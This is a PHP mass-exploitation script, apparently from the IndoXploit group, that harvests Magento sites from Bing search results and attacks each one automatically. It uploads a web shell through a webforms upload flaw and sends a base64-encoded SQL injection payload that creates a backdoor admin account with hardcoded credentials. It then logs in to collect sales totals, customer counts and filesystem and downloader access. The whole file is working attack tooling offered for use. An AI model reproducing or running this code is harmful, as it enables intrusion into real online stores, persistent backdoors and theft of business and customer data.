Bot Magento with Bing Grabber

1. <?php
2. error_reporting(0);
3. set_time_limit(0);
4.  
5. class indoxploit_mage_exploit {
6.     private $jsvulnpath = "/js/webforms/upload/";
7.     private $postjs = "files[]";
8.  
9.     public function cover() {
10.         print "[ ========================================== ]\n";
11.         print "-----> Magento Xploit with Bing Grabber <-----\n";
12.         print "All in One Package: [webforms,add admin] Xploit\n";
13.         print "Coded by: l0c4lh34rtz ( Mr. Error 404 )\n";
14.         print "Greetz: IndoXploit - Sanjungan Jiwa\n";
15.         print "[ ========================================== ]\n\n";
16.     }
17.     public function ngcurl($url,$post=null) {
18.         $ch = curl_init($url);
19.         if($post != null) {
20.             curl_setopt($ch, CURLOPT_POST, true);
21.             curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
22.         }
23.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
24.             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
25.             curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
26.             curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
27.             curl_setopt($ch, CURLOPT_COOKIESESSION, true);
28.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
29.             curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
30.             curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
31.         return curl_exec($ch);
32.             curl_close($ch);
33.     }
34.     public function xploit($url, $post) {
35.         $ch = curl_init();
36.               curl_setopt($ch, CURLOPT_URL, $url);
37.               curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
38.               curl_setopt($ch, CURLOPT_TIMEOUT, 60);
39.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
40.               curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
41.               curl_setopt($ch, CURLOPT_POST, 1);
42.         $headers  = array();
43.         $headers[] = 'Accept-Encoding: gzip, deflate';
44.         $headers[] = 'Content-Type: application/x-www-form-urlencoded';
45.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
46.               curl_setopt($ch, CURLOPT_HEADER, 1);
47.         return curl_exec($ch);
48.               curl_close($ch);
49.     }
50.     public function ambilKata($param, $kata1, $kata2){
51.         if(strpos($param, $kata1) === FALSE) return FALSE;
52.         if(strpos($param, $kata2) === FALSE) return FALSE;
53.         $start = strpos($param, $kata1) + strlen($kata1);
54.         $end = strpos($param, $kata2, $start);
55.         $return = substr($param, $start, $end - $start);
56.         return $return;
57.     }
58. }
59.  
60. $idx = new indoxploit_mage_exploit();
61. $shell = "id.php";
62. $dork = str_replace("'", "", $argv[1]);
63. $dork = urlencode($dork);
64. if(isset($dork)) {
65.     $idx->cover();
66.     $npage = 1;
67.     $npages = 30000;
68.     $allLinks = array();
69.     $lll = array();
70.     while($npage <= $npages) {
71.         $x = $idx->ngcurl("http://www.bing.com/search?q=".$dork."&first=".$npage."", null);
72.         if($x) {
73.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
74.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
75.             $npage = $npage + 10;
76.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
77.         } else break;
78.     }
79.     $URLs = array();
80.     foreach($allLinks as $url){
81.         $exp = explode("/", $url);
82.         $URLs[] = $exp[2];
83.     }
84.     $array = array_filter($URLs);
85.     $array = array_unique($array);
86.     $sss = count(array_unique($array));
87.     print "Load ($sss) sites\n";
88.     print "<------------------------>\n\n";
89.     foreach($array as $domain) {
90.         if($_SESSION[$domain]) {
91.             //
92.         } else {
93.         $_SESSION[$domain] = "1";  
94.         // set var all site + path to x
95.         $domain = "http://$domain"; // URL TARGET
96.         $domain_exploit = $domain."/index.php/"; // URL to Exploit
97.         $domain_exploit_add_admin = $domain_exploit."/admin/Cms_Wysiwyg/directive/index/";
98.         $domain_downloader = $domain."/downloader/"; // URL to Downloader
99.         $domain_admin = $domain_exploit."/admin/"; // URL to Admin Page
100.         $domain_js = $domain."/js/webforms/upload/";
101.         // end set varr all site + path to x
102.         print "[+] URL: $domain ";
103.         // set var all curl page
104.         $cek_web = $idx->ngcurl($domain_exploit, null); // CURL to Index of site
105.         $cek_downloader = $idx->ngcurl($domain_downloader, null); // CURL to Downloader Site
106.         $cek_admin = $idx->ngcurl($domain_admin, null); // CURL to Admin Page
107.         $cek_webforms = $idx->ngcurl($domain_js, null);
108.         // end var all curl page
109.  
110.         // set all exploit webforms
111.         $post_js = array("files[]" => "@$shell");
112.         $exploit_js = $idx->ngcurl($domain_js, $post_js);
113.         preg_match('/"url":"(.*?)"/', $exploit_js, $sh);
114.         // end set all exploit webforms
115.  
116.         // set all exploit add admin
117.         $postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdJbmRvWHBsb2l0JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdpbmRvJywneHBsb2l0JywnbmdhbnVAbmdhbnUuY29tJywnaW5kb3hwbG9pdCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ2luZG94cGxvaXQnKSwnRmlyc3RuYW1lJyk7%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
118.         $result = $idx->xploit($domain_exploit_add_admin, $postdata);
119.         $ambil = htmlspecialchars(@file_get_contents($domain_admin));
120.         preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
121.         $post_login = array(
122.             "form_key" => $key[1],
123.             "login[username]" => "indoxploit",
124.             "dummy" => "",
125.             "login[password]" => "IndoXploit",
126.         );
127.         $login_web = $idx->ngcurl($domain_admin, $post_login);
128.         preg_match_all('#<span class="price">(.*?)</span>#', $login_web, $matches);
129.         $links = array_unique($matches[1]);
130.         preg_match_all('/<span class=\"nowrap\" style=\"font-size:18px; color:#EA7601;\">(.*?)<span/', $login_web, $quality);
131.         $qual = array_unique($quality[1]);
132.         $key2 = $idx->ambilKata($login_web,"/filesystem/adminhtml_filesystem/index/key/","/");
133.         $curl_filesystem = $idx->ngcurl($domain_exploit."/filesystem/adminhtml_filesystem/index/key/$key2/", null);
134.         $post_downloader = array(
135.             "username" => "indoxploit",
136.             "password" => "IndoXploit",
137.         );
138.         $curl_downloader = $idx->ngcurl($domain_downloader, $post_downloader);
139.         preg_match_all("/<td class=\"first\">(.*?)<\/td>/", $curl_downloader, $pack);
140.         $key3 = $idx->ambilKata($login_web,"/customer/index/key/","/");
141.         $curl_customer = $idx->ngcurl($domain_exploit."/admin/customer/index/key/$key3/", null);
142.         preg_match_all("/<span id=\"customerGrid-total-count\" class=\"no-display\">(.*?)<\/span>/", $curl_customer, $cust);
143.         // end set all exploit add admin
144.  
145.         if(preg_match("/Mage.Cookies.domain/", $cek_web) OR preg_match("/magento/", $cek_downloader) OR preg_match("/magento/", $cek_admin)) {
146.             print "[Magento]\n";
147.             print "[ ==================================================== ]\n";
148.             print "[+] Trying to exploit [Webforms]: ";
149.             if(preg_match("[]", $cek_webforms) AND !preg_match("/404|Not Found|Error|Forbidden|403/i", $cek_webforms)) {
150.                 print "Vuln | ";
151.                 if(preg_match("/{$shell}|webforms/", $exploit_js)) {
152.                     print "Xploited!\n";
153.                     print "[+] Shell: ".str_replace("\\", "", $sh[1])."\n";
154.                 } else {
155.                     print "Not Xploited.\n";   
156.                 }
157.             } else {
158.                 print "Not Vuln\n";
159.             }
160.             print "[+] Trying to exploit [add admin]: ";
161.             if(preg_match('#200 OK#', $result)) {
162.                 print "Xploited! | ";
163.                 if(preg_match('/Log Out|indoxploit/', $login_web)) {
164.                     print "[Login: OK]\n";
165.                     print "[ ====================[ $$$$$$$$ ]==================== ]\n";
166.                     print "[+] Lifetime Sales: ".$links[0]."\n";
167.                     print "[+] Average Orders: ".$links[1]."\n";
168.                     print "[+] Quantity Orders: ".$qual[3][0]."\n";
169.                     print "[+] Total Customers: ".$cust[1][0]." Customers\n";
170.                     print "[ ====================[ $$$$$$$$ ]==================== ]\n";
171.                     print "[ ====================[ /\/\/\/\ ]==================== ]\n";
172.                     print "[+] Filesystem: ";
173.                     if(preg_match("/File System/", $curl_filesystem)) {
174.                         print "Found!\n";
175.                     } else {
176.                         print "Not Found.\n";
177.                     }
178.                     print "[+] Downloader: ";
179.                     if(preg_match("/Magento Downloader/", $cek_downloader)) {
180.                         print "Found! | ";
181.                         if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) {
182.                             if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
183.                                 $stat_down = "Not Writeable.";
184.                             } else {
185.                                 $stat_down = "Writeable";
186.                             }
187.                             $in = 0;
188.                             print "[Login: OK] [$stat_down]\n";
189.                             //print "[+] Packages installed: \n";
190.                             foreach($pack[1] as $packages) {
191.                                 $in++;
192.                                 //print "-> $packages\n";
193.                             }
194.                             print "[+] Installed packages: (".$in.") Packages\n";
195.                         } else {
196.                             print "[Login Downloader Failed]\n";
197.                         }
198.                     } else {
199.                         print "[Not Found]\n";
200.                     }
201.                     print "[ ====================[ \/\/\/\/ ]==================== ]\n";
202.                     print "[ ==================================================== ]\n";
203.                     print "[+] username: indoxploit\n";
204.                     print "[+] password: IndoXploit\n";
205.                     print "[+] Login Admin: $domain_admin\n";
206.                     print "[ ==================================================== ]\n\n";
207.                 } else {
208.                     print "[Login Admin Failed]\n\n";
209.                 }
210.             } else {
211.                 print "Not Vuln\n\n";
212.             }
213.         } else {
214.             print "[Not Magento]\n\n";
215.         }
216.         }
217.     }
218. } else {
219.     print "usage: php ".$argv[0]." 'bing_dork'\n";
220. }